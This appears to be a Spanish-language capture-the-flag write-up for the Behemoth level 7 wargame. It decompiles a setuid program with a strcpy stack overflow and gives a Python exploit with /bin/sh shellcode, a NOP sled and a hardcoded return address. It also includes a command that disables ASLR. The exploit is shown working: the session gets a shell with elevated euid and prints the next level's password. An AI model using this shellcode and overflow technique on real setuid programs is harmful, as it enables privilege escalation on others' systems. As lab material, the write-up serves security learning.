Behemoth7

Recordamos deshabilitar ASLR con: $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

undefined4 main(int param_1,int param_2,int param_3)

{
  size_t __n;
  ushort **ppuVar1;
  char local_210 [512];
  int local_10;
  int Contador1;
  char *local_8;

  local_8 = *(char **)(param_2 + 4);
  Contador1 = 0;
  while (*(int *)(param_3 + Contador1 * 4) != 0) {
    __n = strlen(*(char **)(param_3 + Contador1 * 4));
    memset(*(void **)(param_3 + Contador1 * 4),0,__n);
    Contador1 = Contador1 + 1;
  }
  local_10 = 0;
  if (1 < param_1) {
    while ((*local_8 != '\0' && (local_10 < 0x200))) {
      local_10 = local_10 + 1;
      ppuVar1 = __ctype_b_loc();
      if ((((*ppuVar1)[*local_8] & 0x400) == 0) &&
         (ppuVar1 = __ctype_b_loc(), ((*ppuVar1)[*local_8] & 0x800) == 0)) {
        fprintf(stderr,"Non-%s chars found in string, possible shellcode!\n","alpha");
                    /* WARNING: Subroutine does not return */
        exit(1);
      }
      local_8 = local_8 + 1;
    }
    strcpy(local_210,*(char **)(param_2 + 4));
  }
  return 0;
}

from struct import *
import sys

SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
OFFSET = 'A'*512+'BBBB'*4
NOP_SLED = "\x90"*50
DIR_SHELLCODE = pack("I",0xffffd460 )
PAYLOAD = OFFSET+DIR_SHELLCODE+NOP_SLED+SHELLCODE 
sys.stdout.write(PAYLOAD)

behemoth7@behemoth:/tmp/Marmeus$ /behemoth/behemoth7 $(python E7.py)
$ id
uid=13007(behemoth7) gid=13007(behemoth7) euid=13008(behemoth8) groups=13007(behemoth7)
$ cat /etc/behemoth_pass/behemoth8       
pheewij7Ae
$